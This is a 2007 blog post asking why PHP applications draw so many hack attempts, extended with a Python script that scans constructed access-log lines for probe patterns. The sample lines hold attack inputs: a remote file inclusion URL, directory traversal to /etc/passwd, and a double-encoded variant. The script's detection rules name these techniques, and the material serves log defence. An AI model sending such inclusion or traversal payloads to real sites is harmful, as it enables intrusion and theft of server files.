PHP and Security Holes
Filed in: Website Management.
Watch out - I'm about to make myself sound like a snob. :)
What is it about PHP that spawns applications with security holes? My site gets hit a lot by people/bots probing for security holes, and said hack attempts exclusively include "php" somewhere in the URL. Witness a smattering of hack attempts that have occurred recently:
As an aside, even an idiot could see that last URL wouldn't work. Evidently the tool used to probe it was written by a chimp. But I digress.
What's with all the security holes in PHP apps? Is it just that PHP is so popular for web development that it has the same problem as Windows (the majority use it, so hacks are more common)? Of course, all of the URLs there have something in common - they obviously count on the application in question using input from the end user without validating it first. Is there something in PHP which tends to encourage this sort of thing, or is it just that it's so widely used that it attracts more lazy programming?
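The probes described above all share one shape: a request for some PHP script with a parameter that the attacker hopes will be passed, unvalidated, to an include or a file operation. That shape is easy to pick out of an access log. The following is an added example, not code from the original post or from any of the applications it mentions: it parses constructed Apache-style log lines (RFC 5737 documentation addresses, invented paths and parameters) and flags requests whose query parameters carry a remote URL, a directory-traversal sequence, or an absolute local file path. It also shows why "php" in the URL on its own is a poor signal: a legitimate page whose path merely mentions php is not flagged.

```python
"""Flag access-log requests that look like PHP-application probes.

Added example, not code from the original post. The log lines are
constructed (RFC 5737 documentation addresses) and the signatures are the
classic shapes of the probes the post complains about: a query parameter
that carries a remote URL (remote file inclusion), directory traversal,
and an absolute local file path.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache "combined" log lines: two probes, a double-encoded
# probe, a normal CGI hit, and a normal page whose *path* merely mentions php.
LOG_LINES = """\
203.0.113.7 - - [25/Jun/2007:20:12:01 +0100] "GET /index.php?page=http://203.0.113.9/cmd.txt? HTTP/1.1" 404 284 "-" "Mozilla/4.0"
203.0.113.7 - - [25/Jun/2007:20:12:02 +0100] "GET /blog/wp-content/plugins/foo/bar.php?path=../../../../etc/passwd HTTP/1.1" 404 284 "-" "Mozilla/4.0"
203.0.113.7 - - [25/Jun/2007:20:12:03 +0100] "GET /admin/config.php?dir=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 284 "-" "Mozilla/4.0"
198.51.100.4 - - [25/Jun/2007:20:13:10 +0100] "GET /mt/mt-comments.cgi HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
198.51.100.4 - - [25/Jun/2007:20:13:11 +0100] "GET /archives/2007/06/php-and-security-holes.html HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""

# Simplified combined-log pattern: only the fields this script needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(target):
    """Return the probe indicators present in one request target.

    'php-path' is informational only: plenty of legitimate URLs contain
    "php". The parameter-based indicators are what make a request a probe.
    """
    parts = urlsplit(target)
    indicators = []
    if 'php' in parts.path.lower():
        indicators.append('php-path')
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decoding again catches %252e-style
        # double encoding used to slip past naive filters.
        value = unquote(value)
        if re.match(r'(?i)^(https?|ftp)://', value):
            indicators.append(f'remote-url:{key}')
        if '../' in value or '..\\' in value:
            indicators.append(f'traversal:{key}')
        elif value.startswith(('/etc/', '/proc/')):
            indicators.append(f'local-file:{key}')
    return indicators


def is_probe(indicators):
    """A request is a probe only if something other than the path says so."""
    return any(i != 'php-path' for i in indicators)


def scan(log_text):
    """Parse log lines and return (ip, target, indicators) for each probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        ind = classify(m['target'])
        if is_probe(ind):
            hits.append((m['ip'], m['target'], ind))
    return hits


def probing_ips(log_text, min_hits=2):
    """IPs with at least min_hits probe requests: candidates for blocking."""
    counts = Counter(ip for ip, _, _ in scan(log_text))
    return {ip: n for ip, n in counts.items() if n >= min_hits}


if __name__ == '__main__':
    for ip, target, ind in scan(LOG_LINES):
        print(ip, target, ind)
    print(probing_ips(LOG_LINES))
```

Run against a real log, `scan` is the thing to pipe into a blocklist or an alert; the `min_hits` threshold in `probing_ips` is there because a single odd request from a browser plugin or a misconfigured link is not worth an alert, while three traversal attempts from one address in two seconds clearly is. Note that the 404 status on the probes in the sample is what a site without the targeted script returns; a 200 on one of these is the line worth reading twice.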
Of course, both WordPress and Movable Type (two applications I use on this site) have had security holes - one uses PHP, the other uses Perl, and both are written to a very high standard. Both are also widely used, which suggests to me that PHP is a victim of its own success. Like Windows, they're so common that any security holes are highly sought after by hackers.
That said, I'd be extremely hesitant about installing any other PHP applications here...
Posted June 25, 2007 8:34 PM